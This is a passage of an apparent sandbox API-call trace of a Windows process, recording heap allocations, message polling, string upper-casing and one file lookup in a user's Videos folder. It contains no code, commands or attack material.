(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.841] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0213.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0213.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0213.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0213.842] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0213.842] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0213.843] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0213.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0213.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0213.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0213.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0213.843] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0213.843] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0213.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0213.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0213.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0213.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0213.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0213.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0213.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0213.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0213.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0213.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0213.846] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0213.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0213.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0213.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0213.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0213.846] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0213.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0213.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0213.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0213.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0213.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0213.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0213.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0213.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0213.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0213.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0213.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0213.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0213.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0213.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0213.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.848] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/sDbATpZQ6r.swf", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62ccc210, ftCreationTime.dwHighDateTime=0x1d5d08d, ftLastAccessTime.dwLowDateTime=0xe5493b90, ftLastAccessTime.dwHighDateTime=0x1d5c9f5, ftLastWriteTime.dwLowDateTime=0xe5493b90, ftLastWriteTime.dwHighDateTime=0x1d5c9f5, nFileSizeHigh=0x0, nFileSizeLow=0x17996, dwReserved0=0x0, dwReserved1=0x0, cFileName="sDbATpZQ6r.swf", cAlternateFileName="SDBATP~1.SWF")) returned 0x9e1bf8 [0213.848] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0213.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0213.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0213.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0213.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0213.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0213.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0213.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0213.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.849] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0213.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0213.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0213.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0213.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0213.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0213.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0213.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0213.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.850] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.850] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0213.850] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.850] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0213.850] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.850] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0213.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0213.850] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0213.851] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0213.851] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0213.851] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 